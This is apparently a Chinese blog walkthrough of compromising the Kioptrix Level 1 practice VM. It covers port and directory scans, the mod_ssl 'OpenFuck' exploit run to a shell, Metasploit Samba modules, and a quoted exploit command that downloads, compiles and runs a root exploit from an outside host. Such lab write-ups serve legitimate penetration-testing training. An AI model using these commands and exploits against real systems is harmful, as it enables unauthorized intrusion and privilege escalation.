Kioptrix这个系列靶机默认是桥接模式,如果我们kali使用NAT是扫描不到靶机的,通过VM的靶机网络设置也不能更改成功。

解决方式:每次下载好靶机先不导入VM,如果已经导入,需要“移除”靶机;然后通过修改靶机目录中的vm配置文件,删除所有ethernet0为首的行,之后,导入VM中,重新添加网络适配器并选择NAT模式,这样kali就能扫描到靶机了

kali IP:192.168.1.128

靶机IP:192.168.1.130

sudo nmap --min-rate 10000 -p- 192.168.1.130

Starting Nmap 7.92 ( https://nmap.org ) at 2023-08-17 10:27 CST

Nmap scan report for 192.168.1.130

Host is up (0.0023s latency).

Not shown: 65529 closed tcp ports (reset)

PORT     STATE SERVICE

22/tcp   open  ssh

80/tcp   open  http

111/tcp  open  rpcbind

139/tcp  open  netbios-ssn

443/tcp  open  https

1024/tcp open  kdm


sudo nmap -sT -sV -O -p22,80,111,139,443,1024 192.168.1.130

Starting Nmap 7.92 ( https://nmap.org ) at 2023-08-17 10:40 CST

Nmap scan report for 192.168.1.130

Host is up (0.00036s latency).

PORT     STATE SERVICE     VERSION

22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)

80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)

111/tcp  open  rpcbind     2 (RPC #100000)

139/tcp  open  netbios-ssn Samba smbd (workgroup: yMYGROUP)

443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b

1024/tcp open  status      1 (RPC #100024)

MAC Address: 00:0C:29:7C:3A:16 (VMware)

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Device type: general purpose

Running: Linux 2.4.X

OS CPE: cpe:/o:linux:linux_kernel:2.4

OS details: Linux 2.4.9 - 2.4.18 (likely embedded)

Network Distance: 1 hop

mod_ssl,OpenSSL,rpcbind,Samba 都可以进行尝试

搜索了一下rpcbind只有拒绝服务。

sudo nmap -sU -p22,80,111,139,443,1024 192.168.1.130

Starting Nmap 7.92 ( https://nmap.org ) at 2023-08-17 10:42 CST

Nmap scan report for 192.168.1.130

Host is up (0.00025s latency).

PORT     STATE  SERVICE

22/udp   closed ssh

80/udp   closed http

111/udp  open   rpcbind

139/udp  closed netbios-ssn

443/udp  closed https

1024/udp closed unknown

UDP扫描一下有没有遗漏的服务

访问80端口和443端口,发现网络架构相同,和nmap扫描出的服务相同。

扫描目录:

sudo dirb http://192.168.1.130

-----------------

DIRB v2.22

By The Dark Raver

-----------------

START_TIME: Fri Aug 18 10:18:03 2023

URL_BASE: http://192.168.1.130/

WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.130/ ----

+ http://192.168.1.130/~operator (CODE:403|SIZE:273)

+ http://192.168.1.130/~root (CODE:403|SIZE:269)

+ http://192.168.1.130/cgi-bin/ (CODE:403|SIZE:272)

+ http://192.168.1.130/index.html (CODE:200|SIZE:2890)

==> DIRECTORY: http://192.168.1.130/manual/

==> DIRECTORY: http://192.168.1.130/mrtg/

==> DIRECTORY: http://192.168.1.130/usage/                                                                                  

---- Entering directory: http://192.168.1.130/manual/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.130/mrtg/ ----

+ http://192.168.1.130/mrtg/index.html (CODE:200|SIZE:17318)                                                                

---- Entering directory: http://192.168.1.130/usage/ ----

+ http://192.168.1.130/usage/index.html (CODE:200|SIZE:4261)

radhat的默认首页和配置文档 没有利用点

看了一下apache 1.3.20有什么漏洞可以利用

searchsploit apache 1.3.20

mod_ssl=2.8.4<2.8.7,尝试使用

searchsploit -m 47080.c

  Exploit: Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)

      URL: https://www.exploit-db.com/exploits/47080

     Path: /usr/share/exploitdb/exploits/unix/remote/47080.c

File Type: C source, ASCII text

gcc -o exploit 47080.c -lcrypto

47080.c:21:10: fatal error: openssl/ssl.h: 没有那个文件或目录

   21 | #include <openssl/ssl.h>

      |          ^~~~~~~~~~~~~~~

compilation terminated.

下载依赖库之后重新编译

exploit中符合要求有0x6a,0x6b

sudo ./exploit 0x6a 192.168.1.130 -c 50

*******************************************************************

* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *

*******************************************************************

* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *

* #hackarena  irc.brasnet.org                                     *

* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *

* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *

* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *

*******************************************************************

Connection... 50 of 50

Establishing SSL connection

cipher: 0x4043808c   ciphers: 0x80f8068

Ready to send shellcode

Spawning shell...

Good Bye!

 sudo ./exploit 0x6b 192.168.1.130 -c 50

*******************************************************************

* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *

*******************************************************************

* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *

* #hackarena  irc.brasnet.org                                     *

* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *

* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *

* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *

*******************************************************************

Connection... 50 of 50

Establishing SSL connection

cipher: 0x4043808c   ciphers: 0x80f8068

Ready to send shellcode

Spawning shell...


bash: no job control in this shell

bash-2.05$

d.c; ./exploit; -kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmo

--23:19:52--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

           => `ptrace-kmod.c'

Connecting to dl.packetstormsecurity.net:443...

dl.packetstormsecurity.net: Host not found.

gcc: ptrace-kmod.c: No such file or directory

gcc: No input files

rm: cannot remove `ptrace-kmod.c': No such file or directory

bash: ./exploit: No such file or directory

bash-2.05$

检查权限

uname -a

Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown

whoami;id

apache

uid=48(apache) gid=48(apache) groups=48(apache)

百度说是这个.c文件获取外网文件被墙 导致获取的不是root权限

Samba尝试 尝试了下 只有最有一个对139端口进行攻击 其他的利用模块都是针对mamba的服务端口443进行攻击的

use exploit/linux/samba/

Matching Modules

================

   #  Name                                     Disclosure Date  Rank       Check  Description

   -  ----                                     ---------------  ----       -----  -----------

   0  exploit/linux/samba/setinfopolicy_heap   2012-04-10       normal     Yes    Samba SetInformationPolicy AuditEventsInfo Heap Overflow

   1  exploit/linux/samba/chain_reply          2010-06-16       good       No     Samba chain_reply Memory Corruption (Linux x86)

   2  exploit/linux/samba/is_known_pipename    2017-03-24       excellent  Yes    Samba is_known_pipename() Arbitrary Module Load

   3  exploit/linux/samba/lsa_transnames_heap  2007-05-14       good       Yes    Samba lsa_io_trans_names Heap Overflow

   4  exploit/linux/samba/trans2open           2003-04-07       great      No     Samba trans2open Overflow (Linux x86)

一般来说 系统赋予smb服务为root权限

samba/setinfopolicy_heap 信息策略审计时间堆溢出

Samba chain_reply内存损坏漏洞:该漏洞利用代码会损坏Samba 3.3.13以前版本中分配给响应数据包的内存,可通过传递超过目标缓冲区大小的值实现。

samba/is_known_pipename CVE-2017-7494,Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。Samba 允许连接一个远程的命名管道,并且在连接前会调用 is_known_pipename() 函数验证管道名称是否合法。在 is_known_pipename() 函数中,pipename并没有检查管道名称中的部分特殊字符,加载了使用该名称的动态链接库。导致攻击者可以构造一个恶意的动态链接库文件,执行任意代码。

Samba lsa_io_trans_names Heap Overflow 堆溢出

Samba trans2open溢出:这是Samba2.2.0版本到2.2.8版本中普遍存在的一个缓冲区溢出漏洞,其工作原理是利用没有noexec栈选项的x86 Linux机器中的漏洞。

配置好后run借助samba直接能拿到root权限

继续之前的mod_ssl进行,根据网上的思路 可以在128访问外网下载 exploit中130需访问的外网文件,通过更改exploit中,使130访问128临时开启的80端口下载文件,执行expoit获取root权限。

nl 47080.c|grep ptrace

    8   * Note: if required, host ptrace and replace wget target

  308  #define COMMAND2 "unset HISTFILE; cd /tmp; wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmod.c; ./exploit; \n"

wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

--2023-08-18 09:29:59--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

正在解析主机 dl.packetstormsecurity.net (dl.packetstormsecurity.net)... 198.84.60.200

正在连接 dl.packetstormsecurity.net (dl.packetstormsecurity.net)|198.84.60.200|:443... 已连接。

已发出 HTTP 请求,正在等待回应... 200 OK

长度:3921 (3.8K) [text/x-csrc]

正在保存至: “ptrace-kmod.c”

ptrace-kmod.c                      100%[================================================================>]   3.83K  --.-KB/s  用时 0s      

2023-08-18 09:30:01 (131 MB/s) - 已保存 “ptrace-kmod.c” [3921/3921])

编写 47080.c ,然后重新编译,临时开启128的80服务,同时执行exploit

python3 -m http.server 80

Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

192.168.1.130 - - [18/Aug/2023 09:37:16] "GET /ptrace-kmod.c HTTP/1.0" 200 -

Kioptrix Level 1的更多相关文章

  1. Kioptrix Level 2

    简介 Vulnhub是一个提供各种漏洞环境的靶场平台. 个人学习目的:1,方便学习更多类型漏洞.2,为OSCP做打基础. 下载链接 https://www.vulnhub.com/entry/kiop ...

  2. vulnhub 靶机 Kioptrix Level 1渗透笔记

    靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ kali ip 信息收集 先使用nmap收集目标的ip地址 nmap -sP 1 ...

  3. OSCP Learning Notes - Enumeration(1)

    Installing Kioptrix: Level 1 Download the vm machine form https://www.vulnhub.com/entry/kioptrix-lev ...

  4. OSCP Learning Notes - Exploit(1)

    Gaining Root with Metasploit Platform: Kali Linux, Kioptrix Level 1 1. Find the IP of Kioptirx nmap ...

  5. OSCP Learning Notes - Capstone(1)

    Kioptrix Level 1.1 Walkthrough Preparation: Download the virtual machine  from the following website ...

  6. OSCP Learning Notes - Post Exploitation(4)

    Pivoting 1. Edit the virtual network settings of the Vmware. 2. Set the Network Adapter(s) of Kali L ...

  7. OSCP Learning Notes - Post Exploitation(1)

    Linux Post Exploitation Target Sever: Kioptrix Level 1 1. Search the payloads types. msfvenom -l pay ...

  8. OSCP Learning Notes - File Transfers(2)

    Metasploit Target Server: Kioptrix Level 1 (1) Start the Metasploit on Kali Linux. (2) Set the modul ...

  9. Java compiler level does not match解决方法

    从别的地方导入一个项目的时候,经常会遇到eclipse/Myeclipse报Description  Resource Path Location Type Java compiler level d ...

  10. Android requires compiler compliance level 5.0 or 6.0. Found '1.4' instead的解决办法

    今天在导入工程进Eclipse的时候竟然出错了,控制台输出的是: [2013-02-04 22:17:13 - takepicture] Android requires compiler compl ...

随机推荐

  1. Django context must be a dict rather than UserProfile.

    context must be a dict rather than UserProfile. # 主页@login_requireddef index(request): data={} data ...

  2. SpringMVC 简单的开始

    SpringMVC简单的开始 利用Spring模板配置写一个web项目. 1.核心配置文件(模板代码) <?xml version="1.0" encoding=" ...

  3. Python连接es笔记二之查询方式汇总

    本文首发于公众号:Hunter后端 原文链接:Python连接es笔记二之查询方式汇总 上一节除了介绍使用 Python 连接 es,还有最简单的 query() 方法,这一节介绍一下几种其他的查询方 ...

  4. v8 setup

    记录下笔者本人搭建v8环境的过程 环境:处于一些原因笔者选择在kali2023上搭建v8,kali上可以搭建成功但是调试脚本加载有问题,fuck kali,还是ubuntu好,笔者使用了ubuntu2 ...

  5. c# 如何将枚举以下拉数据源的形式返回给前端

    前言: 相信各位有碰到过与我类似的问题,当表中存一些状态的字段,无非以下几种形式1.直接写死 如: 正常:1,异常:2 ,还有一种则是写在字典中,再或者就是加在枚举上,前两者对于返回下拉数据源来说比较 ...

  6. JVM源码分析:深入剖析java.c文件中JavaMain方法中InitializeJVM的实现

    经过前文<从JDK源码级深入剖析main方法的运行机制>的分析,我们知道了实现JavaMain方法的四个主要步骤: 初始化Java虚拟机 加载主运行类 通过加载的主运行类,获取main方法 ...

  7. Mybatis Generator 配置详解

    因原版观感不佳,搬运至此. 作者:Jimin 链接:https://www.imooc.com/article/21444 来源:慕课网 <?xml version="1.0" ...

  8. 2023-07-02:给定一个1~N的排列,每次将相邻两数相加,可以得到新的序列,长度是N-1 再对新的序列,每次将相邻两数相加,可以得到新的序列,长度是N-2 这样下去可以最终只剩一个数字 比如 :

    2023-07-02:给定一个1~N的排列,每次将相邻两数相加,可以得到新的序列,长度是N-1 再对新的序列,每次将相邻两数相加,可以得到新的序列,长度是N-2 这样下去可以最终只剩一个数字 比如 : ...

  9. 基于java+springboot的视频点播网站-在线视频点播系统

    该系统是基于java+springboot开发的视频点播系统.是给师妹开发的毕业设计. 演示地址 前台地址: http://video.gitapp.cn 后台地址: http://video.git ...

  10. P3755 [CQOI2017]老C的任务题解

    如果询问 \(x_1, y_1, x_2, y_2\), 那么询问 \((x_2, y_2)\), \((x_2, y_1 - 1)\), \((x_1 - 1, y_2)\) \((x_1 - 1, ...